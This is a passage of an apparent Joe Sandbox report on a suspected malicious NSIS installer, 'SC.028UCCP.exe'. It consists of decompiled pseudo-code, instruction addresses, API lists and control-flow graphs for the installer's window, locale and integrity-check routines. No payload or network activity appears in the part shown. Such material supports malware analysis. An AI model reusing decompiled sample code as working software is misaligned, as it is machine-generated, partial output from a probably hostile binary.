					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F0F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e378, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ec2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x4293f0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E81();
											goto L26;
										}
										E0040140B(_t127);
										 *0x4293f0 = _t127;
										goto L21;
									}
									__eflags =  *0x4091d4 - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e378);
						 *0x42e378 = _a12;
						L58:
						_t141 =  *0x42b020 - _t133; // 0x0
						if(_t141 == 0) {
							_t142 =  *0x42e378 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b020 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

































                                  0x004039de
                                  0x004039e7
                                  0x00403b28
                                  0x00403b2c
                                  0x00403b30
                                  0x00403b32
                                  0x00403b37
                                  0x00403b42
                                  0x00403b4d
                                  0x00403b52
                                  0x00403b54
                                  0x00403b56
                                  0x00403b59
                                  0x00403b5e
                                  0x00403b6c
                                  0x00403b79
                                  0x00403b80
                                  0x00403b80
                                  0x00403b81
                                  0x00403b81
                                  0x00403b86
                                  0x00403b8c
                                  0x00403b93
                                  0x00403b99
                                  0x00403b9b
                                  0x00403bdb
                                  0x00403be0
                                  0x00403be5
                                  0x00403be5
                                  0x00403bea
                                  0x00403bf3
                                  0x00403bf5
                                  0x00403bfa
                                  0x00403c00
                                  0x00403c04
                                  0x00403c04
                                  0x00403c09
                                  0x00403c0f
                                  0x00000000
                                  0x00000000
                                  0x00403c15
                                  0x00403c1a
                                  0x00403c20
                                  0x00000000
                                  0x00000000
                                  0x00403c29
                                  0x00403c31
                                  0x00403c36
                                  0x00403c39
                                  0x00403c3f
                                  0x00403c44
                                  0x00403c47
                                  0x00403c4d
                                  0x00403c52
                                  0x00403c55
                                  0x00403c5b
                                  0x00403c63
                                  0x00403c69
                                  0x00403c6f
                                  0x00403c73
                                  0x00403c7a
                                  0x00403c7a
                                  0x00403c7a
                                  0x00403c84
                                  0x00403c96
                                  0x00403ca2
                                  0x00403ca7
                                  0x00403cb1
                                  0x00403cb7
                                  0x00403cb9
                                  0x00403cbe
                                  0x00403cbb
                                  0x00403cbb
                                  0x00403cbb
                                  0x00403cce
                                  0x00403ce6
                                  0x00403ce8
                                  0x00403cee
                                  0x00403d03
                                  0x00403cf0
                                  0x00403cf9
                                  0x00403cfb
                                  0x00403cfb
                                  0x00403d09
                                  0x00403d19
                                  0x00403d2a
                                  0x00403d31
                                  0x00403d37
                                  0x00403d3b
                                  0x00403d40
                                  0x00403d42
                                  0x00000000
                                  0x00403d48
                                  0x00403d48
                                  0x00403d4a
                                  0x00000000
                                  0x00000000
                                  0x00403d50
                                  0x00403d54
                                  0x00403d79
                                  0x00403d7f
                                  0x00403d85
                                  0x00403d87
                                  0x00000000
                                  0x00000000
                                  0x00403dad
                                  0x00403db3
                                  0x00403db5
                                  0x00403dba
                                  0x00000000
                                  0x00000000
                                  0x00403dc0
                                  0x00403dc3
                                  0x00403dc6
                                  0x00403ddd
                                  0x00403de9
                                  0x00403e02
                                  0x00403e08
                                  0x00403e0c
                                  0x00403e11
                                  0x00403e17
                                  0x00000000
                                  0x00000000
                                  0x00403e21
                                  0x00403e2c
                                  0x00000000
                                  0x00403e2c
                                  0x00403d56
                                  0x00403d5c
                                  0x00000000
                                  0x00000000
                                  0x00403d62
                                  0x00403d68
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403d6e
                                  0x00403d42
                                  0x00403e39
                                  0x00403e45
                                  0x00403e4c
                                  0x00000000
                                  0x00403b9d
                                  0x00403b9d
                                  0x00403ba0
                                  0x00403bd3
                                  0x00403bd3
                                  0x00403bd5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403bd5
                                  0x00403ba2
                                  0x00403ba6
                                  0x00403bab
                                  0x00403bad
                                  0x00000000
                                  0x00000000
                                  0x00403bbd
                                  0x00403bc5
                                  0x00000000
                                  0x00403bcb
                                  0x004039f9
                                  0x004039f9
                                  0x004039fd
                                  0x00403a02
                                  0x00403a11
                                  0x00403a11
                                  0x00403a1a
                                  0x00403a23
                                  0x00403a2e
                                  0x00403a2e
                                  0x00403a3a
                                  0x00403a56
                                  0x00403a59
                                  0x00403a6c
                                  0x00403a72
                                  0x00403b15
                                  0x00000000
                                  0x00403b1e
                                  0x00403a78
                                  0x00403a85
                                  0x00403a87
                                  0x00403a89
                                  0x00403aa8
                                  0x00403aa8
                                  0x00403aab
                                  0x00403ab0
                                  0x00403ab3
                                  0x00403ac3
                                  0x00403ac4
                                  0x00403ac6
                                  0x00403afc
                                  0x00403b0f
                                  0x00000000
                                  0x00403b0f
                                  0x00403ac8
                                  0x00403ace
                                  0x00403ae7
                                  0x00403aec
                                  0x00403aee
                                  0x00000000
                                  0x00000000
                                  0x00403af0
                                  0x00403adc
                                  0x00403adc
                                  0x00403ade
                                  0x00403ade
                                  0x00000000
                                  0x00403ade
                                  0x00403ad1
                                  0x00403ad6
                                  0x00000000
                                  0x00403ad6
                                  0x00403ab5
                                  0x00403abb
                                  0x00000000
                                  0x00000000
                                  0x00403abd
                                  0x00000000
                                  0x00403abd
                                  0x00403aad
                                  0x00000000
                                  0x00403aad
                                  0x00403a93
                                  0x00403a9a
                                  0x00403aa0
                                  0x00403aa2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403aa2
                                  0x00403a5e
                                  0x00000000
                                  0x00403a3c
                                  0x00403a42
                                  0x00403a4c
                                  0x00403e52
                                  0x00403e52
                                  0x00403e58
                                  0x00403e5a
                                  0x00403e60
                                  0x00403e65
                                  0x00403e6b
                                  0x00403e6b
                                  0x00403e60
                                  0x00403e75
                                  0x00000000
                                  0x00403e75
                                  0x00403a3a

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A11
                                  • ShowWindow.USER32(?), ref: 00403A2E
                                  • DestroyWindow.USER32 ref: 00403A42
                                  • SetWindowLongA.USER32 ref: 00403A5E
                                  • GetDlgItem.USER32 ref: 00403A7F
                                  • SendMessageA.USER32 ref: 00403A93
                                  • IsWindowEnabled.USER32(00000000), ref: 00403A9A
                                  • GetDlgItem.USER32 ref: 00403B48
                                  • GetDlgItem.USER32 ref: 00403B52
                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B6C
                                  • SendMessageA.USER32 ref: 00403BBD
                                  • GetDlgItem.USER32 ref: 00403C63
                                  • ShowWindow.USER32(00000000,?), ref: 00403C84
                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C96
                                  • EnableWindow.USER32(?,?), ref: 00403CB1
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CC7
                                  • EnableMenuItem.USER32 ref: 00403CCE
                                  • SendMessageA.USER32 ref: 00403CE6
                                  • SendMessageA.USER32 ref: 00403CF9
                                  • lstrlenA.KERNEL32(0042A020,?,0042A020,Bilsynssteder Setup), ref: 00403D22
                                  • SetWindowTextA.USER32(?,0042A020), ref: 00403D31
                                  • ShowWindow.USER32(?,0000000A), ref: 00403E65
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                  • String ID: Bilsynssteder Setup
                                  • API String ID: 3906175533-834225588
                                  • Opcode ID: b991a7b254102f6ecea75b85d71796a317f2d7b88233d17001629b70a85278c2
                                  • Instruction ID: e8fab78920e23da8b75c4c4288663781101d80ffa248271b1c4be7e920c598d9
                                  • Opcode Fuzzy Hash: b991a7b254102f6ecea75b85d71796a317f2d7b88233d17001629b70a85278c2
                                  • Instruction Fuzzy Hash: 5AC19131A04204BBDB21AF62ED45E2B3E6DFB45706F40053EF641B21E1C779A9429B5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403643 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 338 403643-40365b call 405ec3 341 40365d-403668 GetUserDefaultUILanguage call 405af6 338->341 342 40366f-4036a0 call 405a7f 338->342 345 40366d 341->345 348 4036a2-4036b3 call 405a7f 342->348 349 4036b8-4036be lstrcatA 342->349 347 4036c3-4036ec call 403908 call 405733 345->347 355 4036f2-4036f7 347->355 356 403773-40377b call 405733 347->356 348->349 349->347 355->356 357 4036f9-40371d call 405a7f 355->357 362 403789-4037ae LoadImageA 356->362 363 40377d-403784 call 405bba 356->363 357->356 364 40371f-403721 357->364 366 4037b0-4037e0 RegisterClassA 362->366 367 40382f-403837 call 40140b 362->367 363->362 368 403732-40373e lstrlenA 364->368 369 403723-403730 call 405670 364->369 370 4037e6-40382a SystemParametersInfoA CreateWindowExA 366->370 371 4038fe 366->371 378 403841-40384c call 403908 367->378 379 403839-40383c 367->379 375 403740-40374e lstrcmpiA 368->375 376 403766-40376e call 405645 call 405b98 368->376 369->368 370->367 373 403900-403907 371->373 375->376 382 403750-40375a GetFileAttributesA 375->382 376->356 390 403852-40386f ShowWindow LoadLibraryA 378->390 391 4038d5-4038dd call 404f77 378->391 379->373 385 403760-403761 call 40568c 382->385 386 40375c-40375e 382->386 385->376 386->376 386->385 392 403871-403876 LoadLibraryA 390->392 393 403878-40388a GetClassInfoA 390->393 398 4038f7-4038f9 call 40140b 391->398 399 4038df-4038e5 391->399 392->393 395 4038a2-4038c5 DialogBoxParamA call 40140b 393->395 396 40388c-40389c GetClassInfoA RegisterClassA 393->396 403 4038ca-4038d3 call 403593 395->403 396->395 398->371 399->379 401 4038eb-4038f2 call 40140b 399->401 401->379 403->373
                                  C-Code - Quality: 96%
                                  			E00403643() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				signed int _t21;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				struct HINSTANCE__* _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				intOrPtr _t55;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				struct HINSTANCE__* _t71;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t82;

				_t76 =  *0x42ebb0; // 0x5aa248
				_t17 = E00405EC3(6);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a020;
					"1033" = 0x30;
					 *0x435001 = 0x78;
					 *0x435002 = 0;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a020, 0);
					__eflags =  *0x42a020;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040730E, 0x42a020, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00405AF6("1033", _t67 & 0x0000ffff);
				}
				E00403908(_t71, _t84);
				_t21 =  *0x42ebb8; // 0x0
				_t81 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter";
				 *0x42ec20 = _t21 & 0x00000020;
				 *0x42ec3c = 0x10000;
				if(E00405733(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter") != 0) {
					L16:
					if(E00405733(_t92, _t81) == 0) {
						E00405BBA(0, _t74, _t76, _t81,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42eba0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e388 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403908(_t71, __eflags);
							__eflags =  *0x42ec40; // 0x0
							if(__eflags != 0) {
								_t28 = E00404F77(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e36c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a000, 5); // executed
							_t34 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t82 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t82, 0x42e340);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e340);
								 *0x42e364 = _t82;
								RegisterClassA(0x42e340);
							}
							_t36 =  *0x42e380; // 0x0
							_t39 = DialogBoxParamA( *0x42eba0, _t36 + 0x00000069 & 0x0000ffff, 0, E004039D5, 0); // executed
							E00403593(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42eba0; // 0x400000
						 *0x42e344 = E00401000;
						 *0x42e350 = _t71;
						 *0x42e354 = _t25;
						 *0x42e364 = 0x4091ec;
						if(RegisterClassA(0x42e340) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a000 = CreateWindowExA(0x80, 0x4091ec, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eba0, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					if(_t71 == 0) {
						goto L16;
					}
					_t55 =  *0x42ebd8; // 0x5aba28
					_t74 = 0x42db40;
					E00405A7F( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) + _t55, 0x42db40, 0);
					_t57 =  *0x42db40; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42db41;
						 *((char*)(E00405670(0x42db41, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405B98(_t81, E00405645(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E0040568C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                  0x00403649
                                  0x00403652
                                  0x00403659
                                  0x0040365b
                                  0x0040366f
                                  0x00403681
                                  0x00403688
                                  0x0040368f
                                  0x00403695
                                  0x0040369a
                                  0x004036a0
                                  0x004036b3
                                  0x004036b3
                                  0x004036be
                                  0x0040365d
                                  0x0040365d
                                  0x00403668
                                  0x00403668
                                  0x004036c3
                                  0x004036c8
                                  0x004036cd
                                  0x004036d6
                                  0x004036db
                                  0x004036ec
                                  0x00403773
                                  0x0040377b
                                  0x00403784
                                  0x00403784
                                  0x0040379a
                                  0x004037a0
                                  0x004037ae
                                  0x0040382f
                                  0x00403837
                                  0x00403841
                                  0x00403846
                                  0x0040384c
                                  0x004038d6
                                  0x004038db
                                  0x004038dd
                                  0x004038f9
                                  0x00000000
                                  0x004038f9
                                  0x004038df
                                  0x004038e5
                                  0x004038ed
                                  0x004038ed
                                  0x00000000
                                  0x004038e5
                                  0x0040385a
                                  0x0040386b
                                  0x0040386d
                                  0x0040386f
                                  0x00403876
                                  0x00403876
                                  0x0040387e
                                  0x00403886
                                  0x00403888
                                  0x0040388a
                                  0x00403893
                                  0x00403896
                                  0x0040389c
                                  0x0040389c
                                  0x004038a2
                                  0x004038bb
                                  0x004038cc
                                  0x00000000
                                  0x004038d1
                                  0x00403839
                                  0x0040383b
                                  0x00000000
                                  0x004037b0
                                  0x004037b0
                                  0x004037bc
                                  0x004037c6
                                  0x004037cc
                                  0x004037d1
                                  0x004037e0
                                  0x004038fe
                                  0x004038fe
                                  0x00000000
                                  0x004038fe
                                  0x004037ef
                                  0x0040382a
                                  0x00000000
                                  0x0040382a
                                  0x004036f2
                                  0x004036f2
                                  0x004036f7
                                  0x00000000
                                  0x00000000
                                  0x004036fc
                                  0x00403701
                                  0x00403711
                                  0x00403716
                                  0x0040371d
                                  0x00000000
                                  0x00000000
                                  0x00403721
                                  0x00403723
                                  0x00403730
                                  0x00403730
                                  0x00403738
                                  0x0040373e
                                  0x00403766
                                  0x0040376e
                                  0x00000000
                                  0x00403750
                                  0x00403751
                                  0x0040375a
                                  0x00403760
                                  0x00403761
                                  0x00000000
                                  0x00403761
                                  0x0040375c
                                  0x0040375e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040375e
                                  0x0040373e

                                  APIs
                                    • Part of subcall function 00405EC3: GetModuleHandleA.KERNEL32(?,?,?,00403150,00000008), ref: 00405ED5
                                    • Part of subcall function 00405EC3: LoadLibraryA.KERNELBASE(?,?,?,00403150,00000008), ref: 00405EE0
                                    • Part of subcall function 00405EC3: GetProcAddress.KERNEL32(00000000,?), ref: 00405EF1
                                  • GetUserDefaultUILanguage.KERNELBASE(00000006,C:\Users\user\AppData\Local\Temp\,74D0FA90,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000), ref: 0040365D
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  • lstrcatA.KERNEL32(1033,0042A020,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A020,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74D0FA90,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000), ref: 004036BE
                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter,1033,0042A020,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A020,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403733
                                  • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter,1033,0042A020,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A020,00000000), ref: 00403746
                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403751
                                  • LoadImageA.USER32 ref: 0040379A
                                  • RegisterClassA.USER32 ref: 004037D7
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037EF
                                  • CreateWindowExA.USER32 ref: 00403824
                                  • ShowWindow.USER32(00000005,00000000), ref: 0040385A
                                  • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040386B
                                  • LoadLibraryA.KERNEL32(RichEd32), ref: 00403876
                                  • GetClassInfoA.USER32 ref: 00403886
                                  • GetClassInfoA.USER32 ref: 00403893
                                  • RegisterClassA.USER32 ref: 0040389C
                                  • DialogBoxParamA.USER32 ref: 004038BB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                  • API String ID: 2262724009-3499296158
                                  • Opcode ID: c7bd37f06fa2d2c1041450b4cee417967b75f190bdbf37bb4b464d911afaa79b
                                  • Instruction ID: d6b8b8f74f5c97fe18c953e6bf65f24cda553212ccbeeb7194f723ec3a9c37cf
                                  • Opcode Fuzzy Hash: c7bd37f06fa2d2c1041450b4cee417967b75f190bdbf37bb4b464d911afaa79b
                                  • Instruction Fuzzy Hash: EE61D570A442006EE720AF669C45F273EACE74475AF40457EF901B32E1C77DAD028A6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402C33 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 408 402c33-402c81 GetTickCount GetModuleFileNameA call 405846 411 402c83-402c88 408->411 412 402c8d-402cbb call 405b98 call 40568c call 405b98 GetFileSize 408->412 414 402e65-402e69 411->414 420 402cc1 412->420 421 402da8-402db6 call 402bcf 412->421 423 402cc6-402cdd 420->423 427 402db8-402dbb 421->427 428 402e0b-402e10 421->428 425 402ce1-402ce3 call 40308e 423->425 426 402cdf 423->426 432 402ce8-402cea 425->432 426->425 430 402dbd-402dce call 4030c0 call 40308e 427->430 431 402ddf-402e09 GlobalAlloc call 4030c0 call 402e6c 427->431 428->414 449 402dd3-402dd5 430->449 431->428 455 402e1c-402e2d 431->455 434 402cf0-402cf7 432->434 435 402e12-402e1a call 402bcf 432->435 439 402d73-402d77 434->439 440 402cf9-402d0d call 405801 434->440 435->428 445 402d81-402d87 439->445 446 402d79-402d80 call 402bcf 439->446 440->445 454 402d0f-402d16 440->454 451 402d96-402da0 445->451 452 402d89-402d93 call 405f35 445->452 446->445 449->428 457 402dd7-402ddd 449->457 451->423 456 402da6 451->456 452->451 454->445 461 402d18-402d1f 454->461 462 402e35-402e3a 455->462 463 402e2f 455->463 456->421 457->428 457->431 461->445 464 402d21-402d28 461->464 465 402e3b-402e41 462->465 463->462 464->445 466 402d2a-402d31 464->466 465->465 467 402e43-402e5e SetFilePointer call 405801 465->467 466->445 468 402d33-402d53 466->468 471 402e63 467->471 468->428 470 402d59-402d5d 468->470 472 402d65-402d6d 470->472 473 402d5f-402d63 470->473 471->414 472->445 474 402d6f-402d71 472->474 473->456 473->472 474->445
                                  C-Code - Quality: 80%
                                  			E00402C33(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe";
				 *0x42ebac = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe", 0x400);
				_t89 = E00405846(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\Desktop";
				E00405B98("C:\\Users\\hardz\\Desktop", _t91);
				E00405B98(0x436000, E0040568C(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428bd8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BCF(1);
					__eflags =  *0x42ebb4 - _t82; // 0x8c00
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ebb4; // 0x8c00
						E004030C0(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E6C();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ebb0 = _t94;
							 *0x42ebb8 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ebbc =  *0x42ebbc + 1;
								__eflags =  *0x42ebbc;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405801(0x42ebc0, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030C0( *0x414bc8);
					_t65 = E0040308E( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ebb4; // 0x8c00
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040308E(0x420bd8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BCF(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ebb4;
						if( *0x42ebb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BCF(0);
							}
							goto L20;
						}
						E00405801( &_v44, 0x420bd8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414bc8; // 0x3fc1c
						 *0x42ec40 =  *0x42ec40 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ebb4 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40918c
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428bd8; // 0x41480
						if(__eflags < 0) {
							_v12 = E00405F35(_v12, 0x420bd8, _t90);
						}
						 *0x414bc8 =  *0x414bc8 + _t90;
